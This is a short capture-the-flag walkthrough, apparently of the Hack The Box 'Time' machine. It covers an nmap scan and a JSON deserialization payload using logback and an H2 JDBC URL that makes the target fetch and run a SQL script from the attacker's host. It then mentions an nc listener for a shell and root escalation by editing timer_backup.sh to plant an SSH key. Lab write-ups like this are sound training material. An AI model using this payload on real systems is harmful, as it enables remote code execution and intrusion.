In this post, i would like to share a walkthrough of the TIME Machine.


This room has been considered difficulty rated as a MEDIUM machine


Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN 

Information Gathering on the Time machine


Let’s open the browser and straight into the website interface.


We will be directed to the Online JSON interface and let’s do a test on the website by typing anything with the status of Validate(beta!)


Let’s do some research on the errors that appears above


After some research on the internet, I found a script that can be used for exploitation on the website.


The code that we can use for the exploitation looks like below:

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://<attacker's ip>:8080/<filename>.sql'"}]"

Exploiting the application with JSON code


Before we can click the Process, we can create a new file <filename>.sql


The code that will be used can be seen as shown below:


Let’s start our nc listener on other terminal


As usual, you will need to access/home/pericles and you will find user.txt stored inside there.

Next, let’s go and retrieve the root flag!

Escalate to Root Privileges Access on Time Machine


We need to create an ssh public and private key to access the machine via ssh service


You will need to copy your id_rsa code and paste it on the target’s machine with an extra command been use here.


The screenshot above shows the actual code that will paste on your target’s machine


The screenshot above shows the target’s machine


In the screenshot above, the file timer_backup.sh is one that we just modify to access the SSH service.


We should be getting the root access after a while


We can read the root flag by typing the “cat root.txt” command


-THE END-


Happy Learning Guys!